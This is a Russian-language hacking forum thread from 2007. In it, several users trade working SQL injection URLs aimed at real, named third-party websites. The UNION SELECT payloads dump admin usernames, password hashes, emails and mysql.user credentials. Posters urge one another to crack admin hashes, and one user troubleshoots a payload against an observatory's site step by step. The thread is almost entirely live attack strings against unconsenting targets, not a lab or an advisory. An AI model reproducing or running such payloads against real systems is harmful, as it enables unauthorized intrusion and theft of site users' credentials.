ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #671  
Старый 04.03.2007, 16:41
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

2n1†R0x
http://sibdeti.ru/adresa.php?tip=-1+union+select+1,2,concat(username,char(58),user_p assword,char(58),user_email,char(58),user_icq),4,5 ,6,7,8,9,10,11,12,13,14,15+from+phpbb_users/* ну вот например таблица юзеров, можно админский хеш попробовать раcшивровать.

http://www.daoiststudies.org/scholars.php?cmd=list&userid=-1+union+select+1,2,concat(email,char(58),password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+membe rs+limit+0,1/* и перебираем,пасс в чистом виде

Последний раз редактировалось }{0TT@БЬ)Ч; 04.03.2007 в 17:03..
 
Ответить с цитированием

  #672  
Старый 04.03.2007, 18:11
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.ebrain.org.zm/content.php?id=-9%20union%20select%201,id,concat(username,char(58) ,password),4%20from%20users/*
Цитата:
http://www.azs.agh.edu.pl/news.php?id=-225%20UNION%20SELECT%200,1,2,3,4,5,6,7,concat(name ,char(58),password),9,10,11,12%20from%20users/*
Цитата:
http://80.241.173.147/icimus/news.php?id=15%20union%20select%201,2,3,4/*
Цитата:
http://centerstageproject.com/news.php?id=129%20UNION%20SELECT%200,1,2,3,4,5,6%2 0from%20information_schema.tables/*
)))
 
Ответить с цитированием

  #673  
Старый 04.03.2007, 18:31
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

__http://www.herb4all.ru/index.php?group=1000+union+select+1,version(),3/*

__http://www.mp2.ru/?p_id=-1+union+select+1,version(),concat(database(),char( 58),user())/*

__http://www.japanfish.ru/index.php?razdel=-1+union+select+1,2,3/*
 
Ответить с цитированием

  #674  
Старый 04.03.2007, 19:01
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.superherohype.com/news/topnews.php?id=-1+union+select+1
Yahoo.Com

Цитата:
http://widgets.yahoo.com/gallery/view.php?widget=41405'
Цитата:
http://widgets.yahoo.com/gallery/view.php?widget=41405+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15/*
 
Ответить с цитированием

  #675  
Старый 04.03.2007, 22:40
Аватар для Spot
Spot
Новичок
Регистрация: 01.03.2007
Сообщений: 2
Провел на форуме:
3478

Репутация: 0
По умолчанию

_http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

Надеюсь у кого нибудь получиться доломать до пасса админа =)
 
Ответить с цитированием

  #676  
Старый 04.03.2007, 22:44
Аватар для Lancellot
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию

http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user+limit+45/*

user:root а дальше пасса чето не могу найти)))
 
Ответить с цитированием

  #677  
Старый 04.03.2007, 22:52
Аватар для zl0ba
zl0ba
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613

Репутация: 1365


По умолчанию

http://www.corp-gov.ru/bd/index.php3?base_id=-1+union+select+1,version(),3,4,5/*
 
Ответить с цитированием

  #678  
Старый 05.03.2007, 00:07
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.clan-peppers.ru/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*

Надеюсь у кого нибудь получиться доломать до пасса админа =)
Я не знаю, как можно достучаться до пасса админа, не имея скуля. Сайт выдает ошибку при любом значении id..

Цитата:
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5 ,6,7,8+from+mysql.user+limit+45/*

Мдя, ничего не понимаю. При запросе
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+111,2,3,4,5,6,7,8+from+mysql.user
Сайт выдает принтабельной колонку 1. (html код =>
printer_friendly_without.php?id=111)

При запросе
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+concat(user,0x3a,password),2,3,4,5,6,7,8+from+mysql.user
Проявляется printer_friendly_without.php?id=root

Но при запросах
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+user,2,3,4,5,6,7,8+from+mysql.user
и
Код:
http://www.keckobservatory.org/article.php?id=-99+union+select+password,2,3,4,5,6,7,8+from+mysql.user
printer_friendly_without.php?id= остается пустым

Последний раз редактировалось kamaz; 05.03.2007 в 00:21..
 
Ответить с цитированием

  #679  
Старый 05.03.2007, 00:11
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от kamaz  
Я малость не понимаю, где ты взял инфу user:root. Колонка 1 вроде не принтабельна. А при запросах в колонку 2 сайт выдает ошибку.
aes...
 
Ответить с цитированием

  #680  
Старый 05.03.2007, 01:38
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.x2studios.com/index.php?page=papers&id=-8+union+select+1,2,3,concat(user,char(58),password ),5,6,7,8+from+mysql.user
делать нехер =\
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ